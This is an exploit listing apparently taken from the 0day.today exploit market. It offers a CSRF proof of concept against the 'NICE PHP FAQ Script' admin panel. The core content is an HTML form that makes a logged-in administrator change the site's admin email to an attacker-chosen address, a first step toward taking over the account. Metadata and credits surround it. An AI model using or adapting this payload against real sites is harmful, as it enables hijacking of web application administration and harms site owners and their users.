[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NICE PHP FAQ Script CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17876
Category
web applications
Date add
29-03-2012
Platform
php
# Exploit Title: NICE PHP FAQ Script CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/nice-php-faq-script-designer-seo/24292/
# Category::  webapps
# Demo : http://www.nicephpscripts.com/scripts/faqscript/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form name="form2" method="post" action="target.com/admin/[PATH]" onsubmit="return validate(this);">
<input name="adminemail" class="box1" id="adminemail" value="contact@skttours.in" size="35" type="hidden"> 
<input name="Submit" class="btn" value="Update Configuration" type="submit">
</form>



#  0day.today [2024-12-25]  #